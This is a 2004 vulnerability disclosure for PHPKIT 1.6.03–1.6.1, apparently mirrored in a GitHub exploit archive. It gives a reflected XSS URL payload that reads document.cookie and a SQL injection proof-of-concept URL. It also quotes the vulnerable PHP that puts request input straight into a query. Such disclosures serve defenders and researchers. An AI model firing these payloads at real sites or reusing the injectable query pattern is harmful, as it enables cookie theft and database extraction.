forked from hackernix/PacketStorm-Exploits
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathphpkitSQLXSS.txt
More file actions
executable file
·51 lines (28 loc) · 1.23 KB
/
Copy pathphpkitSQLXSS.txt
File metadata and controls
executable file
·51 lines (28 loc) · 1.23 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
Author: Steve
Date: November 22, 2004
Affected Software:PHP KIT
Software Version: 1.6.03 -> 1.6.1
Software URL: http://www.phpkit.de
Attack: SQL Injection, allowing people to manipulate the query into
pulling data.
XSS
############################################################################################################
What is PHPKIT:
PHPKIT is a modular developed Homepage Software which can simple manage
contents of,
messages,guest book, forums and more.
############################################################################################################
XSS
http://www.target.com/phpkit/popup.php?img="><script>alert(document.cookie)</script>
############################################################################################################
SQL INJECTION
http://www.target.com/phpkit/include.php?path=guestbook/print.php&id=1'
CODE:
<?php
if (isset($_REQUEST['id'])) $id=$_REQUEST['id'];
$gbookinfo=$DB->fetch_array($DB->query("SELECT * FROM ".$db_tab['gbook']."
WHERE gbook_id='".$id."' LIMIT 1"));
eval ("\$site_body.= \"".getTemplate("guestbook/print")."\";");
?>
############################################################################################################
cya Steve